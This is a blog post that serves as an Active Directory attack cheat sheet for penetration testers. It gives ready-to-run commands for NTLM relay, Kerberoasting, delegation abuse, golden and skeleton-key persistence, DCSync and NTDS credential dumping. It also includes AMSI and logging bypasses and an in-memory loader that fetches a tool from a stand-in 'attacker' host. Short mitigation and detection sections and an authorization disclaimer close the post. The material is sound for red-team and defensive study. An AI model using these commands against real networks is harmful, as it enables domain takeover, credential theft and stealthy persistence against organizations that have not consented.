SverzBlog

Active Directory Security

7 min read

This guide provides a complete reference for Active Directory (AD) security, covering enumeration, exploitation, lateral movement, and persistence techniques commonly used in penetration testing and red team engagements.

  1. AD Fundamentals
  2. Initial Access & Authentication Attacks
  3. Enumeration Techniques
  4. Privilege Escalation
  5. Lateral Movement
  6. Persistence Mechanisms
  7. Domain Dominance
  8. Forest & Trust Exploitation

AD Fundamentals

Core Components

  • Domain Controllers (DC): Central servers managing AD, holding the NTDS.dit database
  • Forests & Trees: Hierarchical structure containing domains
  • Users & Groups: Four main types - Domain Admins, Service Accounts, Local Administrators, Domain Users
  • Trusts: Enable resource access between domains (Directional/Transitive)
  • Group Policy Objects (GPO): Define rules and settings across the domain
  • Kerberos: Default authentication protocol using tickets (TGT/TGS)
  • NTLM: Legacy authentication protocol still widely used

Key Services

  • LDAP: Lightweight Directory Access Protocol for querying AD
  • SMB: File sharing and remote access protocol
  • WinRM: Windows Remote Management (ports 5985/5986)
  • DNS: Critical for AD name resolution

Initial Access & Authentication Attacks

NTLM Relay Attacks

NTLM relay exploits the challenge-response mechanism when SMB signing is disabled:

 
# Start NTLM relay listener
sudo ntlmrelayx.py -t ldaps://172.16.2.1 -wh attacker-ip --http-port '80,8080' -i
 
 
# Trigger authentication using responder
sudo responder -I eth0

LDAP Pass-back Attacks

Exploit devices/applications using LDAP authentication:

  1. Configure rogue LDAP server:
sudo apt -y install slapd ldap-utils
sudo dpkg-reconfigure -p low slapd
  1. Create vulnerable configuration (olcSaslSecProps.ldif):
dn: cn=config 
replace: olcSaslSecProps 
olcSaslSecProps: noanonymous,minssf=0,passcred
  1. Capture credentials:
sudo tcpdump -SX -i eth0 tcp port 389

Kerberos Attacks

AS-REP Roasting

Target accounts without Kerberos pre-authentication:

 
# Using Rubeus
Rubeus.exe asreproast /format:john /outfile:asrep-hashes.txt
 
 
# Using Impacket
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt

Kerberoasting

Extract service account password hashes:

 
# List Kerberoastable accounts
Rubeus.exe kerberoast /stats
 
 
# Request all service tickets
Rubeus.exe kerberoast /rc4opsec /outfile:kerb-hashes.txt
 
 
# Target specific user
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

Crack with Hashcat:

hashcat -m 13100 kerb-hashes.txt wordlist.txt

Enumeration Techniques

PowerView Commands

Domain Enumeration

 
# Current domain info
Get-Domain
Get-DomainSID
 
 
# Domain policy
Get-DomainPolicyData
 
 
# Domain controllers
Get-DomainController
 
 
# All users
Get-DomainUser
Get-DomainUser -Identity username -Properties *
 
 
# Groups
Get-DomainGroup | select Name
Get-DomainGroup *admin*
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
 
 
# Computers
Get-DomainComputer | select dnshostname
Get-DomainComputer -OperatingSystem "*Server 2019*"
 
 
# Service Principal Names
Get-DomainUser -SPN
 
 
# Shares
Invoke-ShareFinder -Verbose

ACL Enumeration

 
# ACLs for specific object
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
 
 
# Find interesting ACLs for a user
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "username"}

BloodHound Collection

 
# Comprehensive collection
SharpHound.exe --collectionmethods All --excludedcs
 
 
# Stealthy collection
SharpHound.exe --stealth --collectionmethods Group,LocalAdmin,Session,Trusts

Trust Enumeration

 
# Domain trusts
Get-DomainTrust
 
 
# Forest trusts
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name}
 
 
# External trusts
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

Privilege Escalation

Local Privilege Escalation

PowerUp

. .\PowerUp.ps1
Invoke-AllChecks
 
 
# Abuse vulnerable service
Invoke-ServiceAbuse -Name 'VulnService' -UserName 'domain\user'

Kerberos Delegation Attacks

Unconstrained Delegation

Find and exploit servers with unconstrained delegation:

 
# Find servers
Get-DomainComputer -Unconstrained
 
 
# Monitor for tickets (on compromised server)
Rubeus.exe monitor /interval:5 /nowrap
 
 
# Trigger printer bug to capture DC ticket
MS-RPRN.exe \\dc.domain.local \\compromised-server.domain.local
 
 
# Use captured ticket
Rubeus.exe ptt /ticket:base64-ticket

Constrained Delegation

Abuse service accounts with constrained delegation:

 
# Find accounts
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
 
 
# Request TGT and get alternate service ticket
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:"cifs/target.domain.local" /ptt

Resource-Based Constrained Delegation

If you have write access to a computer object:

 
# Add fake computer
New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)
 
 
# Configure RBCD
Set-DomainObject -Identity "target-computer" -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$rbcd_bytes}
 
 
# Get service ticket
Rubeus.exe s4u /user:fake01$ /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

GPO Abuse

With write access to a GPO:

 
# Using gpoddity
python3 gpoddity.py --gpo-id 'GPO-GUID' --domain 'domain.local' --username 'user' --password 'pass' --command 'net localgroup administrators user /add' --dc-ip '10.10.10.1'

Lateral Movement

PowerShell Remoting

 
# Interactive session
Enter-PSSession -ComputerName target
 
 
# Execute commands
Invoke-Command -ComputerName target -ScriptBlock {whoami}
Invoke-Command -ComputerName (Get-Content servers.txt) -FilePath script.ps1
 
 
# Pass credentials
$cred = Get-Credential
Invoke-Command -ComputerName target -Credential $cred -ScriptBlock {whoami}

Pass-the-Hash / Pass-the-Ticket

Using Mimikatz

 
# PTH with NTLM hash
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe
 
 
# PTT with Kerberos ticket
kerberos::ptt ticket.kirbi

Using Rubeus

 
# Pass-the-hash (create new process)
Rubeus.exe asktgt /user:administrator /rc4:hash /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
 
 
# Pass-the-ticket
Rubeus.exe ptt /ticket:base64-ticket

WMI and PSExec

 
# WMI execution
wmic /node:target process call create "cmd.exe /c payload.exe"
 
 
# PSExec
PsExec.exe \\target -u domain\user -p password cmd.exe

Persistence Mechanisms

Golden Ticket

Create a forged TGT valid for any service:

 
# Get krbtgt hash via DCSync
lsadump::dcsync /user:domain\krbtgt
 
 
# Create golden ticket with Rubeus
Rubeus.exe golden /aes256:krbtgt_aes_key /sid:S-1-5-21-xxx /user:Administrator /id:500 /pgid:513 /domain:domain.local /ptt
 
 
# Create with Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt

Silver Ticket

Forge service tickets for specific services:

 
# HTTP service
Rubeus.exe silver /service:http/server.domain.local /rc4:service_hash /sid:domain_sid /user:Administrator /ptt
 
 
# Multiple services (e.g., WMI)
Rubeus.exe silver /service:host/server.domain.local /rc4:hash /user:Administrator /ptt
Rubeus.exe silver /service:rpcss/server.domain.local /rc4:hash /user:Administrator /ptt

Diamond Ticket

More stealthy ticket forgery using legitimate ticket request:

Rubeus.exe diamond /krbkey:krbtgt_aes_key /tgtdeleg /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /ptt

Skeleton Key

Backdoor allowing authentication with master password:

 
# Inject skeleton key (password: mimikatz)
misc::skeleton
 
 
# Use backdoor
net use \\target\c$ /user:domain\administrator mimikatz

ACL Persistence

AdminSDHolder Abuse

 
# Add user to AdminSDHolder ACL
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity user -Rights All

DCSync Rights

 
# Grant DCSync permissions
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity user -Rights DCSync
 
 
# Execute DCSync
lsadump::dcsync /user:domain\krbtgt

DSRM Persistence

Abuse Directory Services Restore Mode:

 
# Enable DSRM logon
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
 
 
# Use DSRM admin account (local admin on DC)

Domain Dominance

DCSync Attack

Extract password hashes from Domain Controller:

 
# Using Mimikatz
lsadump::dcsync /user:domain\krbtgt /domain:domain.local
 
 
# Using SafetyKatz (bypass some AV)
SafetyKatz.exe "lsadump::dcsync /user:domain\administrator" "exit"
 
 
# Remote DCSync with credentials
secretsdump.py domain/user:password@dc-ip

Mass Credential Extraction

 
# From LSASS on DC
privilege::debug
sekurlsa::logonpasswords
 
 
# From NTDS.dit
ntdsutil "activate instance ntds" "ifm" "create full C:\temp" quit quit
secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

Forest & Trust Exploitation

Child to Parent Domain Escalation

Using SID history and Enterprise Admins group:

 
# Get trust key
lsadump::trust /patch
 
 
# Create inter-realm TGT
kerberos::golden /user:Administrator /domain:child.domain.local /sid:child-sid /sids:parent-sid-519 /rc4:trust-key /service:krbtgt /target:parent.domain.local /ticket:ticket.kirbi

Cross-Forest Attacks

Exploit bidirectional trusts:

 
# Enumerate foreign users/groups
Get-DomainForeignUser
Get-DomainForeignGroupMember
 
 
# Kerberoast across trust
Rubeus.exe kerberoast /domain:trusting.forest /dc:foreign-dc.trusting.forest

MSSQL Server Trust Abuse

Chain database links for execution:

-- Enumerate links
EXEC sp_linkedservers
 
-- Execute commands through links
EXEC ('sp_configure ''xp_cmdshell'',1;reconfigure') AT "linked.server"
EXEC ('xp_cmdshell ''whoami''') AT "linked.server"

Detection Evasion Techniques

AMSI Bypass

 
# Simple bypass
[Ref].Assembly.GetType('System.Management.Automation.'+$('AmsiUtils')).GetField($('amsiInitFailed'),'NonPublic,Static').SetValue($null,$true)

Enhanced Logging Bypass

 
# Disable script block logging
[ScriptBlock]."GetField"('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))

AV Evasion with Custom Loaders

 
# Load tools in memory
$data = (New-Object System.Net.WebClient).DownloadData('http://attacker/tool.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Tool.Program]::Main("")

Defensive Considerations

Key Mitigations

  1. Enable SMB Signing: Prevents NTLM relay attacks
  2. Disable LLMNR/NBT-NS: Reduces poisoning attacks
  3. LAPS Implementation: Unique local admin passwords
  4. Credential Guard: Protects against credential theft
  5. Protected Users Group: Additional authentication protections
  6. Audit Policies: Monitor for suspicious activity
  7. Least Privilege: Minimize service account permissions
  8. Network Segmentation: Limit lateral movement
  9. Regular Updates: Patch domain controllers and systems
  10. MFA on Privileged Accounts: Additional authentication layer

Detection Opportunities

  • Monitor for:
    • Kerberoasting activity (Event ID 4769 with RC4)
    • DCSync operations (Event ID 4662)
    • Unusual process creation on DCs
    • Anomalous service ticket requests
    • Pass-the-hash indicators
    • Golden ticket usage patterns

Tools Reference

Enumeration & Exploitation

  • PowerView: AD enumeration toolkit
  • BloodHound: Graph-based AD analysis
  • Rubeus: Kerberos abuse toolkit
  • Mimikatz: Credential extraction
  • Impacket: Python AD attack tools
  • CrackMapExec: Network authentication testing
  • Responder: LLMNR/NBT-NS poisoning
  • mitm6: IPv6 DNS takeover

Post-Exploitation

  • SafetyKatz: AV-evasive Mimikatz
  • SharpHound: BloodHound data collector
  • PowerUp: Local privilege escalation
  • Kekeo: Kerberos exploitation
  • ADModule: PowerShell AD management

Persistence & Stealth

  • SharPersist: Windows persistence toolkit
  • PowerSploit: PowerShell attack framework
  • Empire: Post-exploitation framework
  • Covenant: .NET C2 framework

Remember: These techniques should only be used in authorized penetration testing engagements with proper written permission. Unauthorized access to computer systems is illegal.

Graph View

Backlinks